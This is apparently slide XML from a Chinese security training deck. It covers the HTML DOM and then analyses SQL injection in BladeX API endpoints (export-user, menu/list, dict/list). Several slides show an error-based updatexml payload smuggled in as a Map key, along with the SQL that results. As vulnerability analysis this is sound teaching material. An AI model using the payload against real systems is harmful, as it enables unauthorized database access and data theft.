              </a:rPr>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5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514622" y="1507254"/>
            <a:ext cx="1274708" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>源码</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7974769" y="1507254"/>
            <a:ext cx="1663678" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>树形结构</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1034598" y="1994889"/>
            <a:ext cx="4559249" cy="3915385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="流程 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1157859" y="2462750"/>
            <a:ext cx="4381751" cy="1143747"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3810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流程 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1367991" y="2777262"/>
            <a:ext cx="3515431" cy="490031"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="381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流程 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1157859" y="3821908"/>
            <a:ext cx="4381751" cy="1703037"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">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流程 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488081" y="4252097"/>
            <a:ext cx="3641453" cy="387923"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="381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流程 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1451844" y="4694559"/>
            <a:ext cx="3641452" cy="387923"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="381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流程 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="933254" y="1876587"/>
            <a:ext cx="4751109" cy="4165994"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3810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8008575" y="2130356"/>
            <a:ext cx="1596065" cy="41913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&lt;HTML&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="肘形连接符 35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="8814158" y="2543463"/>
            <a:ext cx="538833" cy="527902"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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5400000">
            <a:off x="8308498" y="2565704"/>
            <a:ext cx="527341" cy="494912"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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818034" y="3057725"/>
            <a:ext cx="1596065" cy="4191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&lt;head&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="矩形 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9225147" y="3054643"/>
            <a:ext cx="1596065" cy="41913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&lt;body&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="44" name="肘形连接符 43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7572087" y="3485783"/>
            <a:ext cx="538833" cy="527902"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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rot="5400000">
            <a:off x="7066427" y="3508024"/>
            <a:ext cx="527341" cy="494912"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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6020001" y="3987976"/>
            <a:ext cx="1596065" cy="4191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&lt;title&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="矩形 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7774136" y="3978930"/>
            <a:ext cx="1045488" cy="42817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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48" name="肘形连接符 47"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="10048972" y="3497275"/>
            <a:ext cx="538833" cy="527902"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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5400000">
            <a:off x="9543312" y="3519516"/>
            <a:ext cx="527341" cy="494912"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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9071611" y="4010249"/>
            <a:ext cx="1133671" cy="42817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&lt;h3&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10318388" y="4019151"/>
            <a:ext cx="1045488" cy="42817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&lt;p&gt;…</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>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/blade-user/export-user</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/api/blade-user/export-user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>接口分析：前面已经说过该接口就是为了导出用户数据。如果想要进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入那么我们就得需要找到利用点，首先我们看下接口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>源码。</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p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="767715" y="2207260"/>
            <a:ext cx="8763000" cy="3971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/blade-user/export-user</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3735705" cy="5168265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从上述的源码中可以看出该接口接受了一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Map&lt;String,Object&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作为入参，并且在后面做查询的时候也下挂了该参数，如果控制该参数也就能执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>我们可以构造构造一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>key=value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的键值对打入该接口看下，这里构造的键值对还是报错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>updatexml(1,concat(0x7e,user(),0x7e),1)=1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>然后通过请求打入该接口后发现成功挂参了，我们在继续执行真正的查询数据库的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方式</a:t>
            </a:r>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050665" y="1308735"/>
            <a:ext cx="7865745" cy="5005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/blade-user/export-user</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这个userService.exportUser(queryWrapper)为实际执行操作数据库的方法：</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下面是通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>mybatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>执行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语句。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="144780" y="1511935"/>
            <a:ext cx="10641965" cy="3272790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="336550" y="5383530"/>
            <a:ext cx="11401425" cy="962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/blade-user/export-user</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一路将断点放行之后可以在控制台中发现有三个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的过程：original SQL为原语句，SQL to parse为解析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>parse the finished SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为最终在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数据库中执行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语句。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>所以通过控制台可以发现最终执行的语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>SELECT id, tenant_id, account, name, real_name, email, phone, birthday, role_id, dept_id, post_id FROM blade_user WHERE (updatexml(1, concat(0x7e, user(), 0x7e), 1) LIKE ? AND is_deleted = ?)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这样就成功实现了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="276225" y="3429000"/>
            <a:ext cx="11169015" cy="1781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/blade-user/export-user</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en-US" altLang="zh-CN"/>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发包结果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如下：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3719195" y="1266825"/>
            <a:ext cx="7339965" cy="5266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blade-system/menu/list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/api/blade-system/menu/list：目的是通过查询菜单列表信息。但是可以通过入参看到，其实入参还是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，其实同样可以通过前面的方式进行挂参</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>打入。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457835" y="2839085"/>
            <a:ext cx="9410700" cy="2924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en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>blade-system/menu/list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3209290" cy="5100320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和前面一样挂参之后请求该接口发现可以成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>打入。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3354705" y="1247140"/>
            <a:ext cx="8543925" cy="5384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en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>blade-system/menu/list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查看执行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语句发现注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>成功。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="144780" y="2624455"/>
            <a:ext cx="11637010" cy="1416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en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>blade-system/menu/list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5382260" cy="5032375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Brup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发包查看注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>成功：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5527675" y="1295400"/>
            <a:ext cx="5852160" cy="4592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blade-system/dict/list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/api/blade-system/dict/list接口目的是查询数据字典相关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>内容。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用方式和前面是一样</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="553085" y="2772410"/>
            <a:ext cx="10001250" cy="3619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2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="699650" y="1999332"/>
            <a:ext cx="6164446" cy="4080352"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 2621"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="879257" y="1607555"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="六边形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="667845" y="1512209"/>
            <a:ext cx="461175" cy="397565"/>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TextBox 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1152931" y="1412623"/>
            <a:ext cx="775195" cy="49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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>示例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
              <a:ea typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
              <a:cs typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图形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591" y="1602718"/>
            <a:ext cx="201682" cy="201682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1928126" y="1526492"/>
            <a:ext cx="2262158" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Js</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
